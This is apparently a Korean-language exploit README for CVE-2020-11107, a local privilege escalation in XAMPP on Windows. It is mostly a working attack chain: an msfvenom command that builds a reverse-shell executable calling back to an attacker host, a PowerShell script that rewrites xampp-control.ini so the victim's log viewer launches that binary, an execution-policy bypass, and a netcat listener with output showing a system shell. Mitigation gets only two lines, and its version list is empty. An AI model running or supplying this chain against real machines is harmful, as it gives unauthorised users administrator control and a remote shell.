
CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4
CVE-2020-11107은 Windows에서 Apache Friends XAMPP에 영향을 미치는 로컬 권한 상승(LPE) 취약점입니다.
권한이 없는 사용자가 XAMPP 제어판 구성 파일(xampp-control.ini)을 수정하고 기본 편집기 실행 파일(notepad.exe)을 악성 실행 파일로 교체할 수 있습니다.
다른 사용자(예: 관리자)가 제어판을 통해 로그를 열면 악성 바이너리가 희생자의 권한으로 실행되어 권한 상승이 발생합니다.
❗ 이 취약점은 Linux나 macOS에는 영향을 미치지 않습니다.
xampp-control.ini는 전역적으로 쓰기 가능C:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe
XAMPP 버전 확인:
type C:\xampp\properties.ini
예시 출력:
base_stack_version=7.3.10-1
base_stack_platform=windows-x64
✅ 해당 버전은 취약합니다.
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe
mkdir C:\temp
# Upload msf.exe into C:\temp
악용 스크립트 (PowerShell):
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
스크립트 실행:
powershell -ExecutionPolicy Bypass -File 50337.ps1
희생자 실행:
C:\xampp\xampp-control.exe
그런 다음 제어판에서 로그 파일을 엽니다.
nc -lvnp 4444
✅ 결과:
Connection received...
C:\WINDOWS\system32>
🎉 권한 상승 성공
XAMPP를 다음 버전 중 하나(또는 그 이상)로 업데이트:
다음 파일의 권한 제한:
C:\xampp\xampp-control.ini